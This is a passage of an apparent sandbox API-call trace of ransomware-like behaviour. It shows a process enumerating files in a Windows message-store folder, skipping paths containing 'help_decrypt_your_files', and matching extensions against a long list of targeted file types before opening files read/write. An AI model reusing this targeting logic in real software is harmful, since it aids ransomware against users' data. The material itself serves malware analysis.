	[0176.488] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.489] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="edb.log" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.log") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.log"
	[0176.489] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.log") returned 59
	[0176.489] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.489] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb.log", cchLength=0x3b | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log") returned 0x3b
	[0176.489] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.489] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.489] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log" | out: lpString1="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log") returned="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log"
	[0176.489] lstrlenW (lpString="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log") returned 59
	[0176.489] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.490] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.490] StrStrW (lpFirst=".log", lpSrch=".") returned=".log"
	[0176.490] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.490] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".log") returned=".log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.490] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.491] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.491] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.491] CloseHandle (hObject=0xffffffff) returned 1
	[0176.491] CloseHandle (hObject=0xffffffff) returned 1
	[0176.492] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edb00001.log", cAlternateFileName="")) returned 1
	[0176.492] lstrcmpW (lpString1="edb00001.log", lpString2="..") returned 1
	[0176.492] lstrcmpW (lpString1="edb00001.log", lpString2=".") returned 1
	[0176.492] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.492] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="edb00001.log" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log"
	[0176.492] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log") returned 64
	[0176.492] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.492] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edb00001.log", cchLength=0x40 | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log") returned 0x40
	[0176.492] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.493] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.493] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log" | out: lpString1="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log") returned="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log"
	[0176.493] lstrlenW (lpString="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log") returned 64
	[0176.493] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.493] StrStrW (lpFirst=".log", lpSrch=".") returned=".log"
	[0176.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.494] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".log") returned=".log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.494] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.494] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.494] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.495] CloseHandle (hObject=0xffffffff) returned 1
	[0176.495] CloseHandle (hObject=0xffffffff) returned 1
	[0176.495] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00001.jrs", cAlternateFileName="EDBRES~1.JRS")) returned 1
	[0176.495] lstrcmpW (lpString1="edbres00001.jrs", lpString2="..") returned 1
	[0176.495] lstrcmpW (lpString1="edbres00001.jrs", lpString2=".") returned 1
	[0176.495] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.496] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="edbres00001.jrs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00001.jrs") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00001.jrs"
	[0176.496] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00001.jrs") returned 67
	[0176.496] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.496] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00001.jrs", cchLength=0x43 | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00001.jrs") returned 0x43
	[0176.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.496] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00001.jrs", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.496] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00001.jrs" | out: lpString1="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00001.jrs") returned="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00001.jrs"
	[0176.497] lstrlenW (lpString="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00001.jrs") returned 67
	[0176.497] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.497] StrStrW (lpFirst=".jrs", lpSrch=".") returned=".jrs"
	[0176.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.497] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dts